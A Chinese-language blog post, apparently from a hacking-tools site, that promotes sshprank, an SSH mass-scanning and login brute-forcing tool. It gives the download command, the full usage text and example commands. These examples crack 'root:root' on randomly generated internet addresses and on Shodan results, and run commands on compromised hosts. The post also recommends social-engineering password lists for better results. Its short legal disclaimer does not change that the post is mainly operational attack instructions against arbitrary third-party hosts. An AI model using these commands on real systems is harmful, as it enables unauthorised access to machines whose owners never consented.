正文

SSH爆破扫描器:sshprank

admin
admin V管理员 /0 评论 /223 阅读
1113
此篇文章发布距今已超过346天,您需要注意文章的内容或图片是否可用!

####################
免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本人及开发者无关。
####################

sshprank SSH扫描器

一款使用python-masscan和shodan模块的高速SSH大规模扫描器,登录破解和banner抓取工具。

SSH扫描爆破工具

下载

git clone https://github.com/noptrix/sshprank.git

使用

[ hacker@blackarch ~ ]$ sshprank -H              __                           __   __________/ /_  ____  _________ _____  / /__  / ___/ ___/ __ / __ / ___/ __ `/ __ / //_/ (__  |__  ) / / / /_/ / /  / /_/ / / / / ,</____/____/_/ /_/ .___/_/   __,_/_/ /_/_/|_|               /_/      --== [ by nullsecurity.net ] ==--usage  sshprank <mode> [opts] | <misc>modes  -h <host:[ports]>     - single host to crack. multiple ports can be seperated                          by comma, e.g.: 22,2022,22222 (default port: 22)  -l <file>             - list of hosts to crack. format: <host>[:ports]. multiple                          ports can be seperated by comma (default port: 22)  -m <opts> [-r <num>]  - pass arbitrary masscan opts, portscan given hosts and                          crack for logins. found sshd services will be saved to                          'sshds.txt' in supported format for '-l' option and                          even for '-b'. use '-r' for generating random ipv4                          addresses rather than scanning given hosts. these                          options are always on: '-sS -oX - --open'.                          NOTE: if you intent to use the '--banner' option then                          you need to specify '--source-ip <some_ipaddr>' which                          is needed by masscan. better check masscan options!  -s <str;page;lim>     - search ssh servers using shodan and crack logins.                          see examples below. note: you need a better API key                          than this one i offer in order to search more than 100                          (= 1 page) ssh servers. so if you use this one use                          '1' for 'page'. don't bother me with this, bitch  -b <file>             - list of hosts to grab sshd banner from                          format: <host>[:ports]. multiple ports can be                          seperated by comma (default port: 22)options  -r <num>              - generate <num> random ipv4 addresses, check for open                          sshd port and crack for login (only with -m option!)  -c <cmd>              - execute this <cmd> on host if login was cracked  -u <user>             - single username (default: root)  -U <file>             - list of usernames  -p                    - single password (default: root)  -P <file>             - list of passwords  -C <file>             - list of user:pass combination  -x <num>              - num threads for parallel host crack (default: 20)  -S <num>              - num threads for parallel service crack (default: 20)  -X <num>              - num threads for parallel login crack (default: 20)  -B <num>              - num threads for parallel banner grabbing (default: 70)  -T <sec>              - num sec for connect timeout (default: 2s)  -R <sec>              - num sec for (banner) read timeout (default: 2s)  -o <file>             - write found logins to file. format:                          <host>:<port>:<user>:<pass> (default: owned.txt)  -e                    - exit after first login was found. continue with other                          hosts instead (default: off)  -v                    - verbose mode. show found logins, sshds, etc.                          (default: off)misc  -H                    - print help  -V                    - print version informationexamples  # crack targets from a given list with user admin, pw-list and 20 host-threads  $ sshprank -l sshds.txt -u admin -P /tmp/passlist.txt -x 20  # first scan then crack from founds ssh services  $ sudo sshprank -m '-p22,2022 --rate 5000 --source-ip 192.168.13.37     --range 192.168.13.1/24'  # generate 1k random ipv4 addresses, then port-scan (tcp/22 here) with 1k p/s  # and crack login 'root:root' on found sshds  $ sudo sshprank -m '-p22 --rate=1000' -r 1000 -v  # search 50 ssh servers via shodan and crack logins using 'root:root' against  # found sshds  $ sshprank -s 'SSH;1;50'  # grab banners and output to file with format supported for '-l' option  $ sshprank -b hosts.txt > sshds2.txt

内置了user和pass字典,你可以扩容或定制,有时配合社会工程学弱口令密码字典生成脚本可能会有意想不到的收获。


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下网